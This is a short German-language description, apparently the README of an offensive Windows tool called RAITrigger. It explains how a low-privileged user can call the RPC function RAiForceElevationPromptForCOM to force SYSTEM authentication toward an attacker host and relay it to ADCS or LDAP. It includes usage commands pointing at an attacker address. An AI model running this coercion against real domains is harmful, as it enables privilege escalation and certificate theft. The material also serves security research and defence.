
Lokaler SYSTEM-Auth-Trigger zum Relaying
Die RPC-Funktion RAiForceElevationPromptForCOM aus der Bibliothek appinfo.dll ermöglicht SYSTEM-Zwang. Dies funktioniert nur auf der Domäne beigetretenen Systemen. Es hat sich herausgestellt, dass diese Funktion von jedem Benutzer mit niedrigen Berechtigungen aufgerufen werden kann (nicht um einen Prozess zu starten), sondern um SYSTEM-Authentifizierung an einem beliebigen Ort auszulösen. Dies liegt daran, dass CreateFileW als SYSTEM zum Speicherort des ersten Eingabeparameters aufgerufen wird:
Da der Benutzer mit niedrigen Berechtigungen immer noch impersoniert wird, kann dies nicht als Potato-Trigger verwendet werden, um Berechtigungen von SEImpersonate auf SYSTEM zu erhöhen:
Aber es kann verwendet werden, um ein Computerkonto-Zertifikat gegen ADCS anzufordern, wenn die Web-Registrierung mit der eingehenden SMB-Authentifizierung aktiviert ist. Oder es kann für LPE verwendet werden, indem es an LDAP weitergeleitet wird – wenn LDAP Signing nicht aktiviert ist.
So lösen Sie die SMB-Authentifizierung aus:
[*] RAITrigger.exe \\attackerip\test\test.exe
So lösen Sie die HTTP-Authentifizierung aus (der WebClient-Dienst muss aktiviert sein):
[*] RAITrigger.exe \\hostname@80\test\test.exe
Die HTTP-Authentifizierung wird nur an Systeme in vertrauenswürdigen Intranet-Zonen ausgelöst. Daher müssen Sie einen ADIDNS-Eintrag für Ihre Kali-IP erstellen oder sich im selben Subnetz befinden und z. B. Responder verwenden. Verwenden Sie niemals den vollständigen FQDN, sondern nur den Hostnamen.
Das Aufrufen dieser Funktion aus der Ferne (selbst mit lokalen Administratorrechten) führt zu rpc_access_denied, daher ist dies keine Alternative zu z. B. PetitPotam oder ähnlichen: